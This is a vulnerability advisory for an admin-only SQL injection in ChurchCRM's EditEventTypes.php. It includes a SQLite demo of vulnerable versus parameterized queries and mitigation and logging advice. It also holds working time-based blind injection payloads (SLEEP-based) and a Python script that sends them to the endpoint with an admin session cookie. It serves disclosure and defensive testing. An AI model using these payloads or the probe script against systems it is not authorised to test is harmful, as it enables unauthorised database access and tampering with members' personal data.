CVE-2026-39343
Status: Received - Intake
SQL Injection in ChurchCRM EditEventTypes.php Allows Admin Data Manipulation

Publication date: 2026-04-07

Last updated on: 2026-04-10

Assigner: GitHub, Inc.

Description
ChurchCRM is an open-source church management system. Prior to 7.1.0, a SQL injection vulnerability exists in the EditEventTypes.php file, which is only accessible to administrators. The EN_tyid POST parameter is not sanitized before being used in a SQL query, allowing an administrator to execute arbitrary SQL commands directly against the database. This vulnerability is fixed in 7.1.0.
Meta Information
Published: 2026-04-07
Last Modified: 2026-04-10
Generated: 2026-06-16
AI Q&A: 2026-04-07
EPSS Evaluated: 2026-06-15
External references: NVD, EUVD
Affected Vendors & Products (1 associated CPE)
Vendor: churchcrm
Product: churchcrm
Version / Range: all versions before 7.1.0 (7.1.0 itself excluded, as it contains the fix)
CWE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
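The weakness class in miniature, as an added example that is not ChurchCRM's code (ChurchCRM is written in PHP; the same distinction applies to PDO prepared statements there). It uses an in-memory SQLite table whose name and columns are hypothetical stand-ins for an event-type table, and shows an EN_tyid value spliced into the two query shapes a parameter is usually embedded in (bare number and quoted string), each hijacked by a payload written for its context, next to the parameterized query that treats the same input as data:

```python
"""CWE-89 in miniature: the same EN_tyid value as SQL text vs. as bound data.

Added example, not ChurchCRM's code. The table and column names are
hypothetical stand-ins; the rows are constructed sample data.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three event types with integer ids."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE event_types (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO event_types VALUES (?, ?)",
        [(1, "Service"), (2, "Meeting"), (3, "Outreach")],
    )
    return conn


def lookup_concat_numeric(conn, en_tyid: str) -> list:
    """Vulnerable: the value is spliced in as a bare number, so any SQL
    syntax inside it becomes part of the statement."""
    sql = "SELECT id, name FROM event_types WHERE id = " + en_tyid
    return conn.execute(sql).fetchall()


def lookup_concat_quoted(conn, en_tyid: str) -> list:
    """Vulnerable: the value is wrapped in quotes, but a quote inside the
    value closes the literal early and the remainder is parsed as SQL."""
    sql = "SELECT id, name FROM event_types WHERE id = '" + en_tyid + "'"
    return conn.execute(sql).fetchall()


def lookup_param(conn, en_tyid) -> list:
    """Fixed: the value is bound as a parameter. The driver never parses it
    as SQL, so an injection string simply matches no row."""
    return conn.execute(
        "SELECT id, name FROM event_types WHERE id = ?", (en_tyid,)
    ).fetchall()


def lookup_validated(conn, en_tyid: str) -> list:
    """Defence in depth: reject anything that is not a plain ASCII integer
    before it reaches the database, so bad input fails loudly rather than
    silently returning nothing."""
    if not (en_tyid.isascii() and en_tyid.isdigit()):
        raise ValueError(f"EN_tyid must be an integer, got {en_tyid!r}")
    return lookup_param(conn, int(en_tyid))


if __name__ == "__main__":
    db = make_db()
    print(lookup_concat_numeric(db, "1 OR 1=1"))    # every row: injected
    print(lookup_concat_quoted(db, "1' OR '1'='1"))  # every row: injected
    print(lookup_param(db, "1 OR 1=1"))             # []: treated as data
    print(lookup_param(db, "1"))                    # [(1, 'Service')]
```

The two concatenating functions differ only in whether the value is quoted, which is exactly why a tester must match the payload to the context: the numeric payload fails with a syntax error against the quoted query and vice versa. The bound query is indifferent to both.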
Compliance Impact

The SQL injection vulnerability in ChurchCRM allows an administrator to execute arbitrary SQL commands, potentially leading to unauthorized access, data exfiltration, and modification of sensitive information stored in the database.

Such unauthorized access and potential data breaches can compromise the confidentiality, integrity, and availability of personal and sensitive data, which are critical requirements under common standards and regulations like GDPR and HIPAA.

Therefore, if exploited, this vulnerability could lead to non-compliance with these regulations due to failure to protect personal data against unauthorized access and disclosure.

Executive Summary

CVE-2026-39343 is a SQL injection vulnerability in ChurchCRM before 7.1.0, located in the EditEventTypes.php page, which is reachable only by administrators.

The EN_tyid POST parameter is placed into a SQL query without sanitization or parameterization, so an authenticated administrator can submit SQL syntax in that field and run arbitrary statements against the application database.

Because the endpoint requires administrator rights, the realistic attacker is someone who already holds, or has stolen, an admin session; the vulnerability turns that application role into direct database access that bypasses the application's own validation and business logic.

Impact Analysis

An attacker who already holds administrator privileges can execute arbitrary SQL with the rights of the application's database account. Depending on those rights, this can lead to:

  • Exfiltration of the entire database, including the personal data ChurchCRM stores about members.
  • Bypassing application-level validation, access checks and UI restrictions, since the injected SQL runs outside the application's logic.
  • Modification or deletion of data, affecting data integrity.
  • Escalation beyond the database if the database account holds dangerous privileges (for example MySQL's FILE privilege or the ability to write files on the server), which could extend to server compromise; this depends on the deployment's configuration rather than on the vulnerability itself.
  • Disruption of service availability, for example by dropping tables or running expensive queries.
Detection Guidance

The vulnerability is confirmed by submitting a crafted EN_tyid value in a POST request to EditEventTypes.php while logged in as an administrator and observing whether the injected SQL executes. Do this only against a non-production copy you are authorised to test, since the endpoint edits event-type records.

A common method is to capture the legitimate POST with an intercepting proxy such as Burp Suite and replace the EN_tyid value with a time-based blind payload. If the parameter is placed inside single quotes in the query, a payload of the form EN_tyid=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 applies; if it is used as a bare number, EN_tyid=1 AND SLEEP(5) is the equivalent, and the wrong choice produces a syntax error with no delay, so try both. SLEEP() is MySQL/MariaDB syntax, which is the database ChurchCRM runs on. URL-encode the payload (quotes, spaces and parentheses) when placing it in the form body.

If the response is consistently delayed by the number of seconds in the payload (here 5 seconds) relative to a baseline request, the injected SQL was executed. Take several measurements and compare medians against the baseline so that ordinary latency is not mistaken for a SLEEP.

Steps:

  • Log in as an administrator and use a proxy (e.g. Burp Suite) to intercept the POST request to EditEventTypes.php.
  • Record the baseline response time of the unmodified request.
  • Replace the EN_tyid value with a time-based payload matching the query context (quoted or numeric).
  • Observe whether the response time increases by the SLEEP duration; a delay that matches the payload and reproduces on repeat indicates successful injection.
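The same probe scripted, as an added example that is not ChurchCRM's code or part of the advisory. It assumes a MySQL/MariaDB backend (SLEEP), a valid administrator session cookie, form fields captured from a legitimate request in the proxy, and a non-production target the tester is authorised to hit; the URL, cookie and field names other than EN_tyid are placeholders. It times a baseline, then each payload context, and decides on medians so that a single slow sample cannot produce a false positive:

```python
"""Time-based blind SQL injection probe for one POST parameter.

Added example; not ChurchCRM's code. Assumes MySQL/MariaDB (SLEEP), an
administrator session cookie, base form fields captured from a proxy, and
an authorised non-production target. TARGET and SESSION_COOKIE are
placeholders.
"""
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request

SLEEP_SECONDS = 5


def build_payloads(sleep_seconds: int = SLEEP_SECONDS) -> dict[str, str]:
    """Payloads for the two common ways a value is embedded in a query.

    'quoted'  : the parameter sits inside single quotes ( ... = '<value>' ).
    'numeric' : the parameter is spliced in as a bare number ( ... = <value> ).
    The wrong context yields a syntax error and no delay, so probe both.
    """
    return {
        "quoted": f"1' AND (SELECT 1 FROM (SELECT(SLEEP({sleep_seconds})))a) AND '1'='1",
        "numeric": f"1 AND SLEEP({sleep_seconds})",
    }


def encode_form(fields: dict[str, str]) -> bytes:
    """Form-encode the body; quotes, spaces and parentheses get escaped."""
    return urllib.parse.urlencode(fields).encode()


def is_delayed(baseline: list[float], probe: list[float],
               sleep_seconds: float, tolerance: float = 0.5) -> bool:
    """True if probe timings exceed the baseline by roughly the SLEEP value.

    Medians mean one slow or fast sample cannot decide the outcome. SLEEP
    only ever adds latency, so the gap should be at least sleep_seconds
    minus a small tolerance for a noisy baseline.
    """
    gap = statistics.median(probe) - statistics.median(baseline)
    return gap >= sleep_seconds - tolerance


def timed_post(url: str, fields: dict[str, str], cookie: str, timeout: float) -> float:
    """POST the form and return wall-clock seconds until the body is read."""
    req = urllib.request.Request(
        url,
        data=encode_form(fields),
        method="POST",
        headers={
            "Cookie": cookie,
            "Content-Type": "application/x-www-form-urlencoded",
        },
    )
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass  # an error page still reflects how long the query ran
    return time.monotonic() - start


def probe(url: str, base_fields: dict[str, str], cookie: str,
          param: str = "EN_tyid", samples: int = 3,
          sleep_seconds: int = SLEEP_SECONDS) -> dict[str, bool]:
    """Measure a baseline, then each payload context; report which delayed."""
    timeout = sleep_seconds * 3  # must comfortably exceed the injected delay
    baseline = [timed_post(url, base_fields, cookie, timeout) for _ in range(samples)]
    verdict = {}
    for context, payload in build_payloads(sleep_seconds).items():
        fields = dict(base_fields, **{param: payload})
        timings = [timed_post(url, fields, cookie, timeout) for _ in range(samples)]
        verdict[context] = is_delayed(baseline, timings, sleep_seconds)
    return verdict


if __name__ == "__main__":
    # Placeholders: substitute the request captured in the proxy.
    TARGET = "https://churchcrm.example/EditEventTypes.php"
    SESSION_COOKIE = "PHPSESSID=<admin session id>"
    captured_fields = {"EN_tyid": "1"}  # plus whatever other fields the form sent
    print(probe(TARGET, captured_fields, SESSION_COOKIE))
```

A result of {'quoted': True, 'numeric': False} (or the reverse) also tells you how the value is embedded in the query, which matters for any follow-up payloads. Bear in mind that each probe request is a real submission of the edit form.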
Mitigation Strategies

The definitive fix is to upgrade ChurchCRM to version 7.1.0 or later, where this vulnerability is fixed.

Until the upgrade is done, reduce the value of the precondition: limit the administrator role to the few accounts that need it, remove or disable stale administrator accounts, and protect the remaining ones with strong, unique credentials, since any compromised admin session can be turned into direct database access. As a general hardening measure, run the application with a database account that holds only the privileges ChurchCRM needs (no FILE privilege, no rights on other schemas), which caps what injected SQL can do.

For monitoring, note that web server access logs record the method and path of requests to EditEventTypes.php but not the POST body, so an injected EN_tyid value is visible only if a reverse proxy or WAF logs request bodies. On the database side, the MySQL slow query log (with long_query_time set below the SLEEP value an attacker would use) captures time-based payloads, and the general query log captures every statement; review both for queries that do not match the application's normal query shapes, and correlate them with administrator logins.
